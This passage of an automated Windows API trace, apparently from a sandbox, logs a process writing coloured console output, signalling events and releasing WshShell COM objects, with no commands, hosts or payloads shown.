hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e250 | out: lpConsoleScreenBufferInfo=0x5a0e250) returned 1 [0167.655] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0167.656] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e26c | out: lpMode=0x5a0e26c) returned 1 [0167.656] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x26fca14*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x5a0e260, lpReserved=0x0 | out: lpBuffer=0x26fca14*, lpNumberOfCharsWritten=0x5a0e260*=0x4f) returned 1 [0167.656] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e24c | out: lpConsoleScreenBufferInfo=0x5a0e24c) returned 1 [0167.657] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0167.657] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e24c | out: lpConsoleScreenBufferInfo=0x5a0e24c) returned 1 [0167.657] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0167.658] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e2ac | out: lpMode=0x5a0e2ac) returned 1 [0167.658] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x22e1700*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5a0e2a0, lpReserved=0x0 | out: lpBuffer=0x22e1700*, lpNumberOfCharsWritten=0x5a0e2a0*=0x1) returned 1 [0167.658] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e2b0 | out: lpConsoleScreenBufferInfo=0x5a0e2b0) returned 1 [0167.659] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e248 | out: lpConsoleScreenBufferInfo=0x5a0e248) returned 1 [0167.659] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e248 | out: lpConsoleScreenBufferInfo=0x5a0e248) returned 1 [0167.659] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e250 | out: lpConsoleScreenBufferInfo=0x5a0e250) returned 1 [0167.660] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0167.660] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e250 | out: lpConsoleScreenBufferInfo=0x5a0e250) returned 1 [0167.660] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0167.661] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e26c | out: lpMode=0x5a0e26c) returned 1 [0167.661] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x26fcd54*, nNumberOfCharsToWrite=0x1f, lpNumberOfCharsWritten=0x5a0e260, lpReserved=0x0 | out: lpBuffer=0x26fcd54*, lpNumberOfCharsWritten=0x5a0e260*=0x1f) returned 1 [0167.662] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e24c | out: lpConsoleScreenBufferInfo=0x5a0e24c) returned 1 [0167.662] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0167.662] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e24c | out: lpConsoleScreenBufferInfo=0x5a0e24c) returned 1 [0167.662] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0167.663] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e2ac | out: lpMode=0x5a0e2ac) returned 1 [0167.663] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x22e1700*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5a0e2a0, lpReserved=0x0 | out: lpBuffer=0x22e1700*, lpNumberOfCharsWritten=0x5a0e2a0*=0x1) returned 1 [0167.663] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e2b0 | out: lpConsoleScreenBufferInfo=0x5a0e2b0) returned 1 [0167.664] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e248 | out: lpConsoleScreenBufferInfo=0x5a0e248) returned 1 [0167.664] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e248 | out: lpConsoleScreenBufferInfo=0x5a0e248) returned 1 [0167.664] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e250 | out: lpConsoleScreenBufferInfo=0x5a0e250) returned 1 [0167.665] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0167.665] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e250 | out: lpConsoleScreenBufferInfo=0x5a0e250) returned 1 [0167.666] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0167.666] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e26c | out: lpMode=0x5a0e26c) returned 1 [0167.666] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x26fc0d4*, nNumberOfCharsToWrite=0x11, lpNumberOfCharsWritten=0x5a0e260, lpReserved=0x0 | out: lpBuffer=0x26fc0d4*, lpNumberOfCharsWritten=0x5a0e260*=0x11) returned 1 [0167.667] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e24c | out: lpConsoleScreenBufferInfo=0x5a0e24c) returned 1 [0167.667] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0167.667] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e24c | out: lpConsoleScreenBufferInfo=0x5a0e24c) returned 1 [0167.668] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0167.668] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e2ac | out: lpMode=0x5a0e2ac) returned 1 [0167.668] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x22e1700*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5a0e2a0, lpReserved=0x0 | out: lpBuffer=0x22e1700*, lpNumberOfCharsWritten=0x5a0e2a0*=0x1) returned 1 [0167.669] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e2b0 | out: lpConsoleScreenBufferInfo=0x5a0e2b0) returned 1 [0167.669] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e248 | out: lpConsoleScreenBufferInfo=0x5a0e248) returned 1 [0167.669] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e248 | out: lpConsoleScreenBufferInfo=0x5a0e248) returned 1 [0167.670] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e250 | out: lpConsoleScreenBufferInfo=0x5a0e250) returned 1 [0167.670] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0167.670] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e250 | out: lpConsoleScreenBufferInfo=0x5a0e250) returned 1 [0167.671] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0167.678] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e26c | out: lpMode=0x5a0e26c) returned 1 [0167.678] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x26fc104*, nNumberOfCharsToWrite=0x1c, lpNumberOfCharsWritten=0x5a0e260, lpReserved=0x0 | out: lpBuffer=0x26fc104*, lpNumberOfCharsWritten=0x5a0e260*=0x1c) returned 1 [0167.678] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e24c | out: lpConsoleScreenBufferInfo=0x5a0e24c) returned 1 [0167.679] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0167.679] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e24c | out: lpConsoleScreenBufferInfo=0x5a0e24c) returned 1 [0167.679] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0167.680] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e2ac | out: lpMode=0x5a0e2ac) returned 1 [0167.680] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x22e1700*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5a0e2a0, lpReserved=0x0 | out: lpBuffer=0x22e1700*, lpNumberOfCharsWritten=0x5a0e2a0*=0x1) returned 1 [0167.681] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e2b0 | out: lpConsoleScreenBufferInfo=0x5a0e2b0) returned 1 [0167.681] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e248 | out: lpConsoleScreenBufferInfo=0x5a0e248) returned 1 [0167.681] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e248 | out: lpConsoleScreenBufferInfo=0x5a0e248) returned 1 [0167.682] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e250 | out: lpConsoleScreenBufferInfo=0x5a0e250) returned 1 [0167.682] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0167.682] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e250 | out: lpConsoleScreenBufferInfo=0x5a0e250) returned 1 [0167.683] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0167.683] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e26c | out: lpMode=0x5a0e26c) returned 1 [0167.683] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x26fc14c*, nNumberOfCharsToWrite=0x1c, lpNumberOfCharsWritten=0x5a0e260, lpReserved=0x0 | out: lpBuffer=0x26fc14c*, lpNumberOfCharsWritten=0x5a0e260*=0x1c) returned 1 [0167.684] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e24c | out: lpConsoleScreenBufferInfo=0x5a0e24c) returned 1 [0167.684] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0167.684] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e24c | out: lpConsoleScreenBufferInfo=0x5a0e24c) returned 1 [0167.685] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0167.685] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e2ac | out: lpMode=0x5a0e2ac) returned 1 [0167.685] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x22e1700*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5a0e2a0, lpReserved=0x0 | out: lpBuffer=0x22e1700*, lpNumberOfCharsWritten=0x5a0e2a0*=0x1) returned 1 [0167.688] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e2b0 | out: lpConsoleScreenBufferInfo=0x5a0e2b0) returned 1 [0167.689] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e248 | out: lpConsoleScreenBufferInfo=0x5a0e248) returned 1 [0167.689] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e248 | out: lpConsoleScreenBufferInfo=0x5a0e248) returned 1 [0167.689] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e250 | out: lpConsoleScreenBufferInfo=0x5a0e250) returned 1 [0167.690] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0167.690] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e250 | out: lpConsoleScreenBufferInfo=0x5a0e250) returned 1 [0167.690] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0167.691] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e26c | out: lpMode=0x5a0e26c) returned 1 [0167.691] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x26fd454*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x5a0e260, lpReserved=0x0 | out: lpBuffer=0x26fd454*, lpNumberOfCharsWritten=0x5a0e260*=0x4f) returned 1 [0167.691] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e24c | out: lpConsoleScreenBufferInfo=0x5a0e24c) returned 1 [0167.692] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0167.692] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e24c | out: lpConsoleScreenBufferInfo=0x5a0e24c) returned 1 [0167.692] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0167.693] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e2ac | out: lpMode=0x5a0e2ac) returned 1 [0167.693] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x22e1700*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5a0e2a0, lpReserved=0x0 | out: lpBuffer=0x22e1700*, lpNumberOfCharsWritten=0x5a0e2a0*=0x1) returned 1 [0167.694] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e2b0 | out: lpConsoleScreenBufferInfo=0x5a0e2b0) returned 1 [0167.694] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e248 | out: lpConsoleScreenBufferInfo=0x5a0e248) returned 1 [0167.695] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e248 | out: lpConsoleScreenBufferInfo=0x5a0e248) returned 1 [0167.695] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e250 | out: lpConsoleScreenBufferInfo=0x5a0e250) returned 1 [0167.695] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0167.696] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e250 | out: lpConsoleScreenBufferInfo=0x5a0e250) returned 1 [0167.696] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0167.696] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e26c | out: lpMode=0x5a0e26c) returned 1 [0167.697] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x26fd6e0*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x5a0e260, lpReserved=0x0 | out: lpBuffer=0x26fd6e0*, lpNumberOfCharsWritten=0x5a0e260*=0x19) returned 1 [0167.697] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e24c | out: lpConsoleScreenBufferInfo=0x5a0e24c) returned 1 [0167.697] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0167.698] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e24c | out: lpConsoleScreenBufferInfo=0x5a0e24c) returned 1 [0167.698] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0167.698] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e2ac | out: lpMode=0x5a0e2ac) returned 1 [0167.699] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x22e1700*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5a0e2a0, lpReserved=0x0 | out: lpBuffer=0x22e1700*, lpNumberOfCharsWritten=0x5a0e2a0*=0x1) returned 1 [0167.700] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e2b0 | out: lpConsoleScreenBufferInfo=0x5a0e2b0) returned 1 [0167.700] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e248 | out: lpConsoleScreenBufferInfo=0x5a0e248) returned 1 [0167.700] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e248 | out: lpConsoleScreenBufferInfo=0x5a0e248) returned 1 [0167.701] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e250 | out: lpConsoleScreenBufferInfo=0x5a0e250) returned 1 [0167.701] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0167.701] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e250 | out: lpConsoleScreenBufferInfo=0x5a0e250) returned 1 [0167.702] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0167.702] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e26c | out: lpMode=0x5a0e26c) returned 1 [0167.702] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x26fdcec*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x5a0e260, lpReserved=0x0 | out: lpBuffer=0x26fdcec*, lpNumberOfCharsWritten=0x5a0e260*=0x4f) returned 1 [0167.703] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e24c | out: lpConsoleScreenBufferInfo=0x5a0e24c) returned 1 [0167.703] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0167.703] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e24c | out: lpConsoleScreenBufferInfo=0x5a0e24c) returned 1 [0167.704] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0167.704] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e2ac | out: lpMode=0x5a0e2ac) returned 1 [0167.704] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x22e1700*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5a0e2a0, lpReserved=0x0 | out: lpBuffer=0x22e1700*, lpNumberOfCharsWritten=0x5a0e2a0*=0x1) returned 1 [0167.705] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e2b0 | out: lpConsoleScreenBufferInfo=0x5a0e2b0) returned 1 [0167.705] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e248 | out: lpConsoleScreenBufferInfo=0x5a0e248) returned 1 [0167.706] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e248 | out: lpConsoleScreenBufferInfo=0x5a0e248) returned 1 [0167.706] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e250 | out: lpConsoleScreenBufferInfo=0x5a0e250) returned 1 [0167.706] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0167.707] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e250 | out: lpConsoleScreenBufferInfo=0x5a0e250) returned 1 [0167.707] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0167.707] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e26c | out: lpMode=0x5a0e26c) returned 1 [0167.708] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x26fded8*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x5a0e260, lpReserved=0x0 | out: lpBuffer=0x26fded8*, lpNumberOfCharsWritten=0x5a0e260*=0x1e) returned 1 [0167.708] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e24c | out: lpConsoleScreenBufferInfo=0x5a0e24c) returned 1 [0167.709] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0167.709] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e24c | out: lpConsoleScreenBufferInfo=0x5a0e24c) returned 1 [0167.709] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0167.709] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e2ac | out: lpMode=0x5a0e2ac) returned 1 [0167.710] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x22e1700*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5a0e2a0, lpReserved=0x0 | out: lpBuffer=0x22e1700*, lpNumberOfCharsWritten=0x5a0e2a0*=0x1) returned 1 [0167.711] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e2b0 | out: lpConsoleScreenBufferInfo=0x5a0e2b0) returned 1 [0167.711] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e248 | out: lpConsoleScreenBufferInfo=0x5a0e248) returned 1 [0167.711] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e248 | out: lpConsoleScreenBufferInfo=0x5a0e248) returned 1 [0167.712] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e250 | out: lpConsoleScreenBufferInfo=0x5a0e250) returned 1 [0167.712] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0167.712] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e250 | out: lpConsoleScreenBufferInfo=0x5a0e250) returned 1 [0167.713] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0167.713] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e26c | out: lpMode=0x5a0e26c) returned 1 [0167.713] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x26fc35c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5a0e260, lpReserved=0x0 | out: lpBuffer=0x26fc35c*, lpNumberOfCharsWritten=0x5a0e260*=0x1) returned 1 [0167.714] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e24c | out: lpConsoleScreenBufferInfo=0x5a0e24c) returned 1 [0167.714] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0167.714] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e24c | out: lpConsoleScreenBufferInfo=0x5a0e24c) returned 1 [0167.715] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0167.715] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e2ac | out: lpMode=0x5a0e2ac) returned 1 [0167.715] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x22e1700*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5a0e2a0, lpReserved=0x0 | out: lpBuffer=0x22e1700*, lpNumberOfCharsWritten=0x5a0e2a0*=0x1) returned 1 [0167.716] EtwEventActivityIdControl () returned 0x0 [0167.716] EtwEventActivityIdControl () returned 0x0 [0167.716] EtwEventActivityIdControl () returned 0x0 [0167.716] EtwEventActivityIdControl () returned 0x0 [0167.717] EtwEventActivityIdControl () returned 0x0 [0167.717] EtwEventActivityIdControl () returned 0x0 [0167.717] EtwEventActivityIdControl () returned 0x0 [0167.717] EtwEventActivityIdControl () returned 0x0 [0167.717] EtwEventActivityIdControl () returned 0x0 [0167.717] EtwEventActivityIdControl () returned 0x0 [0167.717] EtwEventActivityIdControl () returned 0x0 [0167.717] EtwEventActivityIdControl () returned 0x0 [0167.752] SetEvent (hEvent=0x354) returned 1 [0167.752] SetEvent (hEvent=0x348) returned 1 [0167.752] SetEvent (hEvent=0x34c) returned 1 [0167.752] SetEvent (hEvent=0x350) returned 1 [0167.752] SetEvent (hEvent=0x364) returned 1 [0167.752] SetEvent (hEvent=0x358) returned 1 [0167.752] SetEvent (hEvent=0x35c) returned 1 [0167.752] SetEvent (hEvent=0x360) returned 1 [0167.752] SetEvent (hEvent=0x368) returned 1 [0167.753] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x5a0f1d0*=0x370, lpdwindex=0x5a0eff4 | out: lpdwindex=0x5a0eff4) returned 0x0 [0167.759] SetThreadUILanguage (LangId=0x0) returned 0x409 [0167.760] CoCreateGuid (in: pguid=0x5a0f03c | out: pguid=0x5a0f03c*(Data1=0xe7a52d72, Data2=0x153, Data3=0x4e26, Data4=([0]=0x98, [1]=0xfd, [2]=0x73, [3]=0x99, [4]=0x82, [5]=0xc0, [6]=0x54, [7]=0xb))) returned 0x0 [0167.760] QueryPerformanceCounter (in: lpPerformanceCount=0x5a0f01c | out: lpPerformanceCount=0x5a0f01c*=2945257049899) returned 1 [0167.765] QueryPerformanceCounter (in: lpPerformanceCount=0x5a0efe4 | out: lpPerformanceCount=0x5a0efe4*=2945257552663) returned 1 [0167.765] EtwEventActivityIdControl () returned 0x0 [0167.765] EtwEventActivityIdControl () returned 0x0 [0167.765] EtwEventActivityIdControl () returned 0x0 [0167.766] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x2, pHandles=0x5a0eb90*=0x7a0, lpdwindex=0x5a0ea54 | out: lpdwindex=0x5a0ea54) returned 0x0 [0167.766] SetEvent (hEvent=0x798) returned 1 [0167.766] SetEvent (hEvent=0x7a0) returned 1 [0167.766] EtwEventActivityIdControl () returned 0x0 [0167.766] SetEvent (hEvent=0x7a8) returned 1 [0167.766] SetEvent (hEvent=0x798) returned 1 [0167.767] SetEvent (hEvent=0x7a0) returned 1 [0167.767] SetEvent (hEvent=0x7b8) returned 1 [0167.767] SetEvent (hEvent=0x7ac) returned 1 [0167.767] SetEvent (hEvent=0x7b0) returned 1 [0167.767] SetEvent (hEvent=0x7b4) returned 1 [0167.767] SetEvent (hEvent=0x7bc) returned 1 [0167.767] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x5a0f1d0*=0x370, lpdwindex=0x5a0eff4 | out: lpdwindex=0x5a0eff4) returned 0x0 [0167.828] CoGetContextToken (in: pToken=0x5a0f5bc | out: pToken=0x5a0f5bc) returned 0x0 [0167.830] CoGetContextToken (in: pToken=0x5a0efb4 | out: pToken=0x5a0efb4) returned 0x0 [0167.830] CoGetContextToken (in: pToken=0x5a0ef38 | out: pToken=0x5a0ef38) returned 0x0 [0167.830] WshShell:IUnknown:Release (This=0x2851b8) returned 0x1 [0167.830] WshShell:IUnknown:Release (This=0x2851a8) returned 0x0 [0167.830] CoGetContextToken (in: pToken=0x5a0ef38 | out: pToken=0x5a0ef38) returned 0x0 [0167.830] WshShell:IUnknown:Release (This=0x283d98) returned 0x1 [0167.830] WshShell:IUnknown:Release (This=0x283d88) returned 0x0 [0167.830] CoGetContextToken (in: pToken=0x5a0ef38 | out: pToken=0x5a0ef38) returned 0x0 [0167.830] WshShell:IUnknown:Release (This=0x285260) returned 0x1 [0167.830] WshShell:IUnknown:Release (This=0x285250) returned 0x0 [0167.831] CoGetContextToken (in: pToken=0x5a0ef38 | out: pToken=0x5a0ef38) returned 0x0 [0167.831] WshShell:IUnknown:Release (This=0x283d60) returned 0x1 [0167.831] WshShell:IUnknown:Release (This=0x283d50) returned 0x0 [0167.831] CoGetContextToken (in: pToken=0x5a0ef38 | out: pToken=0x5a0ef38) returned 0x0 [0167.831] WshShell:IUnknown:Release (This=0x285228) returned 0x1 [0167.831] WshShell:IUnknown:Release (This=0x285218) returned 0x0 [0167.831] CoGetContextToken (in: pToken=0x5a0ef38 | out: pToken=0x5a0ef38) returned 0x0 [0167.831] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x1 [0167.831] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x0 [0167.831] CoGetContextToken (in: pToken=0x5a0ef38 | out: pToken=0x5a0ef38) returned 0x0 [0167.831] WshShell:IUnknown:Release (This=0x2851f0) returned 0x1 [0167.831] WshShell:IUnknown:Release (This=0x2851e0) returned 0x0 [0167.831] CoGetContextToken (in: pToken=0x5a0ef38 | out: pToken=0x5a0ef38) returned 0x0 [0167.831] WshShell:IUnknown:Release (This=0x283dd0) returned 0x1 [0167.831] WshShell:IUnknown:Release (This=0x283dc0) 